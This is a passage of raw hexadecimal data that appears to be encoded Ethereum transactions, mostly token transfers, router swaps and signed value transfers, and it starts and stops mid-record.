9059cbb000000000000000000000000bf5ae133b9a0fc1a07952a7df2afa21f7f69ef580000000000000000000000000000000000000000000000000000014b392375001ca0f710f31876e0f5b84e6c9edd1c7836dd5bbec17e20a1774e01a9a64edef793b7a07e8148401b05b2bd2e784cbfd22b81e64eba002aa86daebcf1f2db6250265976f86b80851d1a94a2008252089440c3a1146e78564589939b27d72e134abe760164874e848f7d4080008026a036282556fe1f985f26c33e0b803605430981319f78668b95489b7bcbcdf0b51fa0692d0ada42653377dd51211e05d7a54d445ccc9b729d77d5bf95ff3f5f2c3642f8a953851d1a94a20082bc8394a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb0000000000000000000000002ecb7cf6a9a05773ed759d42e603dcb9aafffe6f0000000000000000000000000000000000000000000000000000000011a11a2d26a0f8f23557e1881b9133f2ef7e49681d2ac7cd1d5d79eda69d3e3a91e764aa09f3a06dd9d06f4444f7889c2e977f57b68d9c36275cf436e5102e686df3581f2ec9bcf8a92c851d1a94a20082d83194dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb0000000000000000000000002ecb7cf6a9a05773ed759d42e603dcb9aafffe6f0000000000000000000000000000000000000000000000000000000114e8e70225a0a4bb66ffcbf3055a2ca5d006cfc77379bce72308b1fc6bf7a2f4c5222d7ac0ffa0638d2d4dbb6b3e357ae468883efb8b9834d11374b4957714022a9cc9b2be40f2f86b0d851d1a94a200825208942ecb7cf6a9a05773ed759d42e603dcb9aafffe6f8782529a624c64008026a06882e00f11eb183c6ee7b734129678ca9a94d5e7588c122dcb883fbf9c9c02efa0234db93c01a56256ac4930d7f520521ec6f024bb1ac09db376ada1f8b7a18edaf8a913851d1a94a20082e48094a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb0000000000000000000000002ecd8c7c525c09a613f2e66b05ca065ebbb232ac000000000000000000000000000000000000000000000000000000001471c3c025a0b6ff2d306a6d9c7bab0e938bd2891a0f7c2d956bf80448924639de74708e6620a02048d147b33429d8e053000b14d9c363c82d8a299ea27bbcb5703ecd8d9b5117f8ab8201dc851d1a94a20082e48094a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb0000000000000000000000003a03f1e985f6e31c6e14dbdc351fba2e0ba3523c0000000000000000000000000000000000000000000000000000000011a3fdfa25a0b8e5cb506c3e2e002905fb3d45495a30539af47271c930e1a784c9555da04e71a077cb9d73b3c9225c17d19e659854b2c5906e1ebacc656f795e9103d25d630c81f8ac820f66851d1a94a2008301284a94dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb0000000000000000000000001f8df7eb4c3581a73b59fdc202b18acaa3ef63050000000000000000000000000000000000000000000000000000000008cbc06d25a0a5e4fb533bb17c661987365bb5c7899dc09749067fbf9fbac516c5c1c4b4f866a05f35f1e5370d3b3f0f7940c640137ca760ba3e8e9d043965d7c37a057dc34871f9016d822ce1851ca35f0e0083023749947a250d5630b4cf539739df2c5dacb4c659f2488d80b9010418cbafe500000000000000000000000000000000000000000813f3978f894098440000000000000000000000000000000000000000000000000000000162e513dfb8a08900000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000887b86b6b6957f7bbea88b8cefd392f39236a88c000000000000000000000000000000000000000000000000000000006083950d0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000761d38e5ddf6ccf6cf7c55759d5210750b5d60f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc226a0a6dc2f250a8abd258f1076fd46a445314d961f39f942cf0ae62cc215d6771659a03837ed678e8584f77731810638e77f5bbe880a4571128ad0279b5da67a57d272f86f830b424d851c70b51580825208941a793431b47691a298e3929595ac42281264d90d8802386f26fc1000008026a0cd8fb8ee9a8d972c8ab5dcf71017a5f665ec98972a7586c7b042753d5d190c84a07072062ddd2afd11b15fd671e84cb4291d6a630244104e8e443cfc1045cd5118f9022d823d66851bf08eb0078303799494fad95b6089c53a0d1d861eabfaadd8901b0f853380b901c4d52f7a760000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab9000000000000000000000000000000000000000000000000002715c9ab73c6710000000000000000000000000000000000000000000000001bc16d674ec80000000000000000000000000000000000000000000000000003ec4cdc34772ef0af000000000000000000000000000000000000000000000004fd51c10f4aeed5eb00000000000000000000000000000000000000000000000068155a43676e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044db937d83f2e480aac453f851caf373b607054d0000000000000000000000001d3d5e2ced1afbb2ca00a7834a287b7bb480de980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002669d58ec107775c6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056bc75e2d630fffff25a01564b9d24d66721fbd091ca9a4475145a6e465218e6e9272a26a35f784bb96c4a04305db01884fed92b636d86f99cf4b1ac414adf26dd957a8a0230057ee83665ff8ad8345c742851bf08eb00083032918948762db106b2c2a0bccb3a80d1ed41273552616e880b844a9059cbb000000000000000000000000b98232c3e43aa16a9d28350ac279eed519aae21300000000000000000000000000000000000000000000413c5874e314a7ac000025a0ab79f1e5b33ee075404b077bb42ac84d494f07e442a95afd8c999270d55c8c19a0048ded1de566473e53cc3b75a4619dcab649eecaba75777e80d6388c7fef5871f8ad83472f16851bf08eb00083032918948762db106b2c2a0bccb3a80d1ed41273552616e880b844a9059cbb000000000000000000000000119e73835a8a3750d8bb5ec02bda3cc89afd01cf000000000000000000000000000000000000000000001359efe3822b24cf000026a0251de469326a59a2b4899427454f91254313077ea7f080eecc976b5e2e0e7a7da07a7ad1beeec0ea1844b820889fb67a2911c3fc32d87aebd6a27b5b68dde15b8af8ad830e8346851bf08eb0008303291894a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb000000000000000000000000bd48d64f0ed91604a96937894b978106c4088ab2000000000000000000000000000000000000000000000000000000000ba4f2c626a03106a50040c35b3fd3b6615cc72733f2e5df6ab68891d0a6fce772d5d23052e2a07dfc5041571ae64b9fbe1ea767e16432bc57210e6f1c6c1f72381e7f75b37a40f86a80851bf08eb00082520894093ca6d2cde5629cf6e0e4322a3df693a39649f78640cadae4d0008026a0a15acd78c3185833e2ada7def5796f4d97dcb3799e7d27e32fe0236abd239e20a05e4e687056b052c09f96df121068b6301487908b807f75ac19dd7f255c3c6b5ff8ad83708966851bf08eb0008303291894a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb000000000000000000000000604a1bea12db7f66d282e86d99af26c285a363500000000000000000000000000000000000000000000000000000000000e4e1c026a08b96d7ccb2c4d71dab406bbfba6a7cc066d2b922f1905accd8bd0fb030d8785ca050a58b43695f3a58d2adf5bbe359401cca50958b268203f748eec835acc3dbecf8ad8345c743851bf08eb0008303291894a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4880b844a9059cbb00000000000000000000000077da988c54e1a4cd02c9e66f8f54d940b5f371fe000000000000000000000000000000000000000000000000000000003a19cf5025a06a8ebe589eac9204c0510d9cbf16551bd05a064200518cb33a5d693353942848a04f91b3f339087b95abbbe5fb407a86ae4b40c75cb9801fbc1ce451a926b7310bf9015265851bf08eb0008302c0be947a250d5630b4cf539739df2c5dacb4c659f2488d881bc16d674ec80000b8e47ff36ab5000000000000000000000000000000000000000000000003ec4cdc34772ef0af00000000000000000000000000000000000000000000000000000000000000800000000000000000000000001d3d5e2ced1afbb2ca00a7834a287b7bb480de9800000000000000000000000000000000000000000000000000000000608395120000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab925a0bdb6cab65794d00c0416ae358c03e3311a5a3f5ffc1f0d9d9713ebd302fa9a8aa0141d812ad0818055935ae766c49a9ad54f00432531fae9493999b1379caa71d0f8ec823d67851bf08eb0008302ea1d94fad95b6089c53a0d1d861eabfaadd8901b0f853380b884c23e1a210000000000000000000000004cd647a09a7198fab0e6e85442732479e3be7ab90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044db937d83f2e480aac453f851caf373b607054d26a09d73746912cf38004149f2e404e3501c4b6f000cff70f5e0b14aa3cace6cf876a047bfd70f2faa818a29bb3be9dbd281ac458b9b17823f01a4ca87159e948b8336f8ad83128a34851b8b3abf0083011e8194dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000d1ce15e9632416bd0c7936697217404e8e3f5a820000000000000000000000000000000000000000000000000000000129b9a6c026a07f7fda35920deec2a0f1f638153f988893ea681739ff29506dbe1b8bb2959defa05d898e291d9662a2b6a8ed2c847d3106df16da0ff835a8d435c465865b15c1e4f86e82362f851b0223880082520894ca961fa2209dd3579b21ac63238b9397f609adbd8805a0a01a006bc0008026a09339d5ac0c0b92bded83e06130aa59433365b6d03558436db8831ed8437532cca00a8d0bb53e314948baf445b16929f60326a63bce7dd2bed9fc9d725fad420950f86f83045599851af041e5008262709414122fc3400fb9dd2fea50fedb7d3db8aa622dd7880270bac4d3f738008026a0809dfd93ee7092ee7d278ee7ab9ac4a85baaa9d37acc4a7ccd1244a8739639b4a076fd1f03a218092f63e69cb823d6d69e7fe96d1d432235c2ed2d77706339918bf86e8202ab85192b431900830182b894f466dd932b24723ca063f25a22167c24a06e01c48758d15e176280008026a0710106949719bc351a45be93bf7cdd14da4d464fc27d4a0d37448f2895839e2fa05343ce8f5dd4e759941e000e6f961da67835de782fd68b4c4e2bb52f4daf8776f86e8202af85192b431900830182b894cb021ea4bfb0e0a44e25a92da4be499ed283d8db8758d15e176280008026a0fd3dace00c3040bf0e62f570da70e0f7d187450b85772acce4bf83097178dc55a02def002061704ea119d5adcce00114c928e532ab12251043db8335046d507c31f86e8202b385192b431900830182b8944e5637d43f952c545a4ca745b905b1c8d59b2faa8758d15e176280008025a0ab2b599879f3a36e00dca796f608731e90e9c83a37bb525b775564e22e75f870a06cb68800c7690a589a77b13a4d97b1b575cdc88a3f2b1683cda9c5f3919c8824f86e8202a985192b431900830182b8945d0a1e349d47b131992c643ea19fb786edce8b968758d15e176280008026a0490c1a55dde0c7d322d22f07d8554f5186c54731377e4f50882c13a68c28cb06a04093dee68abfdcfa3082d8a58e249078aba8f42efb263f2805991440f84819d8f86e8202ba85192b431900830182b89477baa3ac098f789962990bd20df3314b02cb089e8758d15e176280008026a096d8af8d6afc62c9410016dfd293776c07f1752fe15dcdbeb3b815ef31dfe3f1a01235ba10bf5b761d12528a6d49c81cc9361df44d04fea6c76220a1a861d69257f86e8202a885192b431900830182b8949b7aea693ffb3daecce609d55ddc2ce2decf883d8758d15e176280008025a07dffd8373e486a7cc7589768bc0da9012ee92505705ad6d8776391c2ac2a763fa0721ce349a669aa9cd518a41608c35ece36566413b6eaa84c360725839d0e8c32f86e8202b285192b431900830182b89436f6a8ad2897af02a8e49baf30b1b170a1bb280d8758d15e176280008026a01b7a8c629b5d6481571c39c73b54cf323552930da6dd820ac1cb94c4ac6c383ca01f40ea5d9572fc845ea30c4baae7fd71ceb11ec8815e8beaf1f23c5ba0074341f86e8202af85192b431900830182b8944565b01e3353cbb73e8b8decc9a0a37ba5d29ccd8758d15e176280008025a08303739fd0361a7ed821578d71ef876a4343a9774a095a5b8a3f76487b59903da01067ce928f438d18477b4297a7db9b4e9d9af555c885d8987ce82d8db561f649f86e8224e085192b431900830182b894908bd7d41f374a9cb8c775568ea4b9ef4a324ffc8758d15e176280008025a073397a3d11b616ed99460467396744f624042486e4f861e091a903ef87534d15a026e02901a6fee94116cad413950d1ca205d61606f55af5102a794e3194909cf6f8a9488518727cda0082d82394dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000930ba2f1c74b09d2ecd89a1126c08343e2e7ea4a00000000000000000000000000000000000000000000000000000022ecb25c0025a04d8be559323d75741869d60c63776c006e4ec7172d194f6a9b9090bb7acd6f51a04d28ba659dd58493e39a2d11acfdf460f2b71f361cc072eb0b74a7979f71dfeff9015482021e8517bfac7c0083027179947a250d5630b4cf539739df2c5dacb4c659f2488d88016345785d8a0000b8e47ff36ab5000000000000000000000000000000000000000000000000d3c523852704a3930000000000000000000000000000000000000000000000000000000000000080000000000000000000000000f5f6d750896380348949a8aecc119eb3d5bc933a00000000000000000000000000000000000000000000000000000000608394dc0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000095a8a98727272ed6ee7b7834c081e55801dcd9e526a0323b3d18af9815b2fde91799b6eafe1a60853c15eea79416bd6c80593c9f07cea0282ffbe053ed415175aeb81d08e6fb5f7f0f536300e18e393d17ec542cc41ac7f8ac820320851755a3194083014a399456a86d648c435dc707c8405b78e2ae8eb4e60ba480b844a9059cbb0000000000000000000000000d71ed670a5b4d6406c4bfca2a8193282cd19682000000000000000000000000000000000000000000000112695ca45fe358000026a04d8074fc026abc0c3da7fab38d214ed05e7e3ce3f92d53cb4390e26b271caa0ba034059431991fcde3d5481f1586883231e062d756b98edb2af34ac769eb09cedff86c8085174876e8008252089418d8db040906224a905a35573ee4ffc1f6c43b1f881211a21a098f00008026a01812c336b6bc7479d55fb4b289b81fbc278e617f3074d1deeb5ac2a2ff478fdda0401c7f7bf0d4cd76d147858ff8bd399cf5ed0b376a8cb35e133ac773494b95e9f86c8085174876e8008252089418d8db040906224a905a35573ee4ffc1f6c43b1f88016534582cdab0008025a04bd9bcfb1cc2ca8b8998af9b710530286e304289e009b35c2edfce89be10afb1a0757469fa0d2d7968b29bdf7458e5f43d1317fcbefe645d9f5c5f5f08a0a697e3f88b82250d85170cdc1e0083015f909484654be796dad370032391d5479f8f1fd9ddd14e80a4d508e6233efa81024ce00541268afed104edb3ee94253085cdd7c0afdf7e0c08fe379a6525a0d199d006578cf7f06178a0b69c3438a7e8338d0b0afc5999c2db7ef25e2a4d44a06f4b9738691c7ecb99f1d63f9f1f6237c2e521119a09b19700df15dc4a3c0d90f901ab1885170cdc1e0083047f25947a250d5630b4cf539739df2c5dacb4c659f2488d80b90144ded9382a0000000000000000000000004ab49ca803942c341076a29ab110b453123d2ebd0000000000000000000000000000000000000000000016d64c573f7aa72a0cf200000000000000000000000000000000000000000011cfdc15f6a2ea4ebc2e1000000000000000000000000000000000000000000000001d0641178be3447b9a00000000000000000000000074516539dc1a410f4162152f7e6410067b5d472400000000000000000000000000000000000000000000000000000000608394e50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b62c91145b0076465f55b62fd72e3e47d575e00f3d2ea97572d03065c70681fa76b3416877c0fee67c0a6212f3a0ac54736e1fa748b53227aa912bb43036d7f4225a017a7dfc17820a1a364e5f9735cdfbb6849413792a22c816d8655e8f7b34c04fda04affc004ebfb32fef222d1046117ae696338eec5555a1a21f8417543450cbad7f88b820c91851689bac800830363449439aa39c021dfbae8fac545936693ac917d5e756380a4a0712d6800000000000000000000000000000000000000000000000000000003775a881c26a07aea1209adcf5e987f2208dd155463f2432bc558b081e62670115ee9b95d3117a07bf128c852d9bb511e7b7e585077e0746e8ef6eb54e496299c6a9cf4b2e6325cf86c808516482a1d008252089444f14099b8b9c60515e83a0cb1a85e14982bb09188011c0f287f9e10008025a0388484f19e481b98265e110caf9fe022df71361e268fc3f15834905635862034a069ff3c458fa733d1cc57b2c48de15af4902e5ba670a9424aac2b355e4d3d3bdbf8a980851632b4f3008288b994514910771af9ca656af840dff83e8264ecf986ca80b844a9059cbb00000000000000000000000032e9dc9968fab4c4528165cd37b613dd5d229650000000000000000000000000000000000000000000000002c346d5098229dc0026a0ddc456ee69e18bb06f38451b6846834b1917dcaae611c2a010bf7a027121ae98a04119cd2deae2d34e65791ab79c13bbb4a0797ab8b8caab103e2a6609bfa78efff8ac823d878515a73b620083019a2894dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000a767aacdd607a6c680e01eeff37acbdb725f825600000000000000000000000000000000000000000000000000000002540be40026a062ec8977035a4da045c73e457a846d02d3269cea656e4ca06ee2310e8201a2a7a00cbfd354e5252f0eda56f435d06e83c5532f9fca7b03571d90ed3fb320cbaaccf8ad8326f0d285156ba09800830493e09469a95185ee2a045cdc4bcd1b1df10710395e4e2380b844a9059cbb0000000000000000000000003975871a61030423406e083d8b971310d403cd1000000000000000000000000000000000000000000000000084798a58fd4e500025a073a15c43ed555010eb9d0425f154f8d80c175c7b0738bcd12361decfb654714ea015197fcf433c2f0da9821dc71fc248aaf29fcd63c6d19ebcd7c9b9efc0c87f11f901cd8240898515495aca40830493e0940000006daea1723962647b7e189d311d757fb79380b90164178979ae00000000000000000000000069ab07348f51c639ef81d7991692f0049b10d5220000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c4e331d039000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000111111111117dc0aa78b770fa6a738034120c3020000000000000000000000000000000000000000000000000000000c3350109e0000000000000000000000000000000000000000000002a4606be5cf6c0000000000000000000000000000000000006daea1723962647b7e189d311d757fb7930000000000000000000000000000006daea1723962647b7e189d311d757fb7930000000000000000000000000000000000000000000000000000000026a00c210e93c87731e07c02e09dcdd1004a307a030a03c09271e5761a264ab6355fa0355d46151a8d36469cecdfb958aa79a6a0d9068627b5cfe775d2efc86f157e7df901cd828cb48515495aca40830493e0940000006daea1723962647b7e189d311d757fb79380b90164178979ae000000000000000000000000e179d801e6882e628d6ce58b94b3c41e35c8518a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c4e331d0390000000000000000000000002260fac5e5542a773aa44fbcfedf7c193bc2c599000000000000000000000000111111111117dc0aa78b770fa6a738034120c3020000000000000000000000000000000000000000000000000000000006358ffa0000000000000000000000000000000000000000000002a41fc475cbaf8000000000000000000000000000000000006daea1723962647b7e189d311d757fb7930000000000000000000000000000006daea1723962647b7e189d311d757fb7930000000000000000000000000000000000000000000000000000000025a0ac51a900e20a01e4b3542466b9ebf7e86a089670a28c3a4481ce2eea5727042ba01fa761b647d28496929c01e04466a97cf780b5e5628f30d90f09e8209b7edda5f9020d828cb58515495aca4083061a80940000006daea1723962647b7e189d311d757fb79380b901a4178979ae000000000000000000000000000000370531eee8149ed162d387aad537899ac7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000104b9d25b91000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000036a698647adf240000000000000000000000000000000000000000000000000009e0a194acc78580000000000000000000000000000000000000000000000000000000000006083910400000000000000000000000000000000000000000000000000000000000000030000000000000000000000001f573d6fb3f13d689ff844b4ce37794d79a7ff1c00000000000000000000000004d0231162b4784b706908c787ce32bd075db9b7000000000000000000000000514910771af9ca656af840dff83e8264ecf986ca0000000000000000000000000000000000000000000000000000000025a00bd180336c3d37ebffdc84dafa7342224dde7a779612b215eeb2d560ce65971da024e4710d8a5f48167f6c85b2c54f6759b474855246f2f5491b2e1381aeb1504ff902ed82060c85153005ce0083030d4094e25a329d385f77df5d4ed56265babe2b99a5436e80b90284a0ab96530000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000001c00000000000000000000000008e870d67f660d95d5be530380d0ec0bd388289e1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002200000000000000000000000005d295c57ad82ee8b50f04454c1da7550c33b286a00000000000000000000000000000000000000000000000000000000000186a00000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000001c000000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000002c75e80b731618bee37b0a0f4d48192c831c4f7d3c38630227ff2ebee7f692e4a7ed9a5b60a3628c2ef219a41f5b22a4bf4815b1ede3dba03ad547a86e88a5d120000000000000000000000000000000000000000000000000000000000000002535f25af4ee96e899309d4de9d02426a2e1785f69fa75b33831b5ad36dc322da3e2f273b96b41d15f7127c097d13b26d26ed1f8728331da5e09ab7762a4965f80000000000000000000000000000000000000000000000000000000000000024b921e1630000000000000000000000000000000000000000001b0a699c818bbaccc20000000000000000000000000000000000000000000000000000000000001ca047fc9e0a9f7e028d470e460ee89749da8cc6c8b9b59bc08bec6caa6a34cd6497a066ff79d3e81b99042510400d4d8d174b6361010fe22cb04aa27d52ba9e0883d8f902ed82060d85153005ce0083030d4094e25a329d385f77df5d4ed56265babe2b99a5436e80b90284a0ab96530000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000001c00000000000000000000000004fabb145d64652a948d72533023f6e7a623c7c53000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002200000000000000000000000005d295c57ad82ee8b50f04454c1da7550c33b286a00000000000000000000000000000000000000000000000000000000000186a00000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000001b000000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000022e262134887ce214e8b2ce5c3d5c642cc5d3da30c508267fbe39704b15928bc9292b1ef821740a52657c721d088ea76ea762aed16eec3b2b311b84558bcb4e4800000000000000000000000000000000000000000000000000000000000000022dd845edc4ef6f482ade8406bc92de33d7df2239da0f5faf8f180698b08628775e80f609ce4c77ace7df62ca65284176fe482429c5d8077636c84b7a450216470000000000000000000000000000000000000000000000000000000000000024b921e1630000000000000000000000000000000000000000001911dba1044408b9440000000000000000000000000000000000000000000000000000000000001ba06dd23f4861befcc7da863abcca5960b6f51b4f131cb86e75f402a8500c6e7c34a04569f046208d3f97d7d5e564472e036c34dfc28a1ad1a4e939c3609931a5d54ef86c0785153005ce00825208940d0707963952f2fba59dd06f2b425ace40b492fe884e9c97835bce54808026a0a7d702a258cceb021146a1bb6684fddbb0ec856815b4595a58bfcac10acc4992a02f5fa59812aa3a0797b098270962bfa1a43e06c707dbdc36b992deea65f54b2bf86c8085153005ce0082520894be6f4f5db6a47a0b57f3145daa006ee15b946b3c8801c5924771d450008026a08c8efa748b36597a3f59fa78b03346d72cc5dd764f97309512dc53bc9fbcd8b9a00b55796318f2ad49ad3b60c4dd42a0a73421f8d01247c7b4df0c6395bf26f9d9f86c0785153005ce00825208940d0707963952f2fba59dd06f2b425ace40b492fe8841065458a28107408025a01173c0e413b9737cf5759153e380d82afa0ec0f0f04821e9205493f39ff53ab9a0737db552928fcff2877719b3d580e519afc55d1106524edb7e8a12991df9b3fef8648085150056c600825208946197dbdedbe3f894e56d8c4c88ae4233cc937502808025a0c370cd4dcedfc915714acd355ce3901fc6499ae1f3d0387a842e59a444df5237a049e40cc4b8e87bb26864b45193b506453a07f11bf403b81d4aab90216956760cf8aa018514f46b0400830135d49477fba179c79de5b7653f68b5039af940ada60ce080b844a9059cbb0000000000000000000000002b2f220909cddaf44aba7441ca4f8d0f43ca3f92000000000000000000000000000000000000000000000005052b3feaeb77b77826a0db95ffbd6f2226696bcac165e1d9c021a8ab48745ac472a5381f0b79602ddafba0343dd9870a3271e7ef7e5ee3f415c4ed13eaa315b5acc9ee03e09f58abab6838f8aa018514f46b0400830135d49477fba179c79de5b7653f68b5039af940ada60ce080b844a9059cbb0000000000000000000000005095583bfeeaf4e6f5f6279c4ace17bcd56fade8000000000000000000000000000000000000000000000005052b3feaeb77b77825a00fceb9ca82a0594885a4dc05a0b05247917c396d2b580723f4b2ea67c306ebbfa046f4305ddc8090fc0651d8a1b1a570bbf617523294b1e46a73387bf87a8f2077f9032b808514f46b0400830285b494f497b83cfbd31e7ba1ab646f3b50ae0af52d03a180b902c42e7ba6ef0000000000000000000000000000000000000000000000000000000000008d7f0000000000000000000000003910da3ff2a9459f763539ca6228807f7a1672f7000000000000000000000000000000000000000000000004de397448a6458b1f00000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000011194bfc6814c952771e7b1053e8642c49d2706646d33387e5dce927ca552a5b82b047a167bd58ff64ff8cc7b1760d94914e3744c6901733c8cdea7a805082bccfcb15a8aa4b96ed3f56025db20a5678213f328847d98b67da99464a379308d3efc15f2c7696eafb27d65b2d0da39e14c59608297b44c5dd2b392f60eb5fee24c7d1aae04f1a02b3de215043d0807b45195b35654e68ec6790703d37df6dc6b85875d42f608b38dc85a64d6c101e8f3a539bc27fadfa175ed922f01a90a984803ce79d10653cbea22266ad9e6029c076d4abf998bb3ee458c9d1a7230fac6d3c682cc86a558fc610ec8e1ae7362558f6f13b2fcea531ec48d9f56ce2424c5cccbe2974c21ec88fcd4053e0103f50523767de81a32d50182cfb66cbdcb96bacd5c3655d2ccd8c21e72912c4dba2bdd629d2c71f1fad9c9a748be3319f381589366a32c7459b904abddf321f0f3d70020a1f5fe1c6895a957db4ad8902a880d50f517a01c9cc3867f53c5df919bfcb853ae924326352f4c3443b286fff5b80c8425261b2f9ff4ca14850d5efdadb8689aad9a45b77dd1ba97736025292afafe71b0a9075da1850718e28364c63ff37bab1092c093b8e4a8005102e94a08b9ba0df9e990e01e4ed1d39357aecfadcec6b1255d23e37281e27dbc682a7f17a85e5da31b28858e04d3e1d528d05d4c56b8a4091e5f43f5a82bd04cd5bcf113b8975f9038125e1cc51cc1d2fa3f2b21d03d96fca7d4d9c2f02bd6fb24bc995a8daa5e36e25a0955dcfa75d8f76602ca4ecb159e7c4f4e16642d77b925016ec14d39708032a8ca00f554c7cd6fde800f4632957fdb4af69d7d3a5b1caed0bd5804d6927239f5c5af8aa018514f46b0400830135d49477fba179c79de5b7653f68b5039af940ada60ce080b844a9059cbb00000000000000000000000057e3b5b1c11f6824127ba576ecb41e7a8b10033b000000000000000000000000000000000000000000000005052b3feaeb77b77826a0059c67a9386142d1bfa9475ddf2eba2917ea8665f95e4ff9624a3312d9a66081a060271ab9ee5a67abec9b205b6cf62b31565ae1d77448f774cd64c58060212f9cf9032b808514f46b0400830285d894f497b83cfbd31e7ba1ab646f3b50ae0af52d03a180b902c42e7ba6ef00000000000000000000000000000000000000000000000000000000000091480000000000000000000000004c9f84461e14c8538e58a50d996b313a01f9d6c0000000000000000000000000000000000000000000000004de397448a6458b1f00000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000011a9f1c02f1cf1d015de63f12ab4bf7083765f3a88cf92c8d1f668a8cc9c9c7e32ed35d1ab84ac08948171aab0b4346a7414eccf0424116d5ca13b2d83064330302699f77581ddf4e28e2d440759c85ec64c38ad6c0fbae9fcdf57c5cdf40a183b797ee9b151330f97deb17635c980b305702ca4b69e35f4b2fa065c7be54f6995019e7670c91c7c21e4e095e7f97d382e71a75d41375644a2a3ad6a8528cabe3e1efb6eef96e192fb394917f760b3df1b83d5f8137a32b7abc6a414ebcff4817880d994b5bd8f0e8fb46dc00276ede4925decc5e282be2bbfd25f9c188f74b43c745e8d4ce95eecad997196bbf63136a4266353b67df40aaa8f6e45f7e8ac27c82d68ac7e9a540fc15d6d704fca0aaf1e8433619ba3d0c3eaf431ec7c1971d5dbb29d413e11a52c7f30ddd7f89cdc761b3cc39b8188f865b5c9972f675a9e1b3dded84241c64a119a3033f1c9a830c3ff92a074d2d3b622262e45c4a48b8eb691e5c0d4d7729d8b470e3a3cac82dd8f578fdc37b4999dd933d2e7c078cf0dc96947d9b0e1ddfaa2f58b3b5d3b2df1edc24458b781c3487639775587b1c6b53e94d0e0a2008edea612229a4877c7d48962a5e6108a7cd65e0a0938be959b943a8afdff7eb171284f86de266d92795a16810c41876878cdc82b2fa6184ae03848c063e6451cd0b3f7cc0b0cbee4a90c576aec1b73af9776c5209d7368950914abf88125e1cc51cc1d2fa3f2b21d03d96fca7d4d9c2f02bd6fb24bc995a8daa5e36e25a004f9ac597aa059671754997edff3ecef5cd7aa4ea66bc56a2f7e096eefaae0b1a00f030c23fcdca711154dc64c4e7bc05e128c1b421c407cd61fc9c9bde1210c1af9032b808514f46b0400830285f094f497b83cfbd31e7ba1ab646f3b50ae0af52d03a180b902c42e7ba6ef000000000000000000000000000000000000000000000000000000000000a68400000000000000000000000003b1e5aef78af244e8e3af64f5434b7d146a8918000000000000000000000000000000000000000000000002e3f21d0b22b94a9a0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000001127a1d2923aded14ca0d036b15221e6b260b574bbac0bec6015251e26dc649f678ad3a07718f8461d72f620232b2a1b279416b8baaa43ce4e289e3a1eb7f208e25d2783304fc51cc2a8a8f37b49a1af9dad9b16973b317501e488e33db8d59631a92475b97b25a623beb7e72ec41fac224d8c8324b473d97c9e0ed0999662613fa3556678c94243621e166ea740f9358fedf0d4d490b1d30a6cc2a35a17c5f2e7d85b077dcd0ab453d7a10f1bd65e798b1d9bf7aa11b52dccf0ac2f039f2912fdcc2759694280c2c109a290d2aeb056cf518ac226ca47f2cd8cd3bd75209d95d4cb9c9e2102e5579fdef3361a06b467128d1025169dc133ebac3a49bb1ff4d6c3a68191fbe0fae01c31a8641c7e52190e9611158a3a07eeb8e60a469fd8ea6cfbd0d054a2cc2bf74b764b5cb36b4060d4a666030fad50b982c6c318ca1ec4f68a317d2430283f32466e3ce77de3a45ad33bb1428ed936a9ca95e1809dc9692f606f51e3cd2a95b017d7c6ebb364434a8455915a37420a974c45e05d0209eb844f491c1018c050a4093a1b2a7bbcaf309b048bebd90c7f61c4a0b15d25f43f76aff0464fdfb5fb25e7a8b705446bfc32bffacdbbe532d6f13f3743df95047b93be990e01e4ed1d39357aecfadcec6b1255d23e37281e27dbc682a7f17a85e5da31b28858e04d3e1d528d05d4c56b8a4091e5f43f5a82bd04cd5bcf113b8975f9038125e1cc51cc1d2fa3f2b21d03d96fca7d4d9c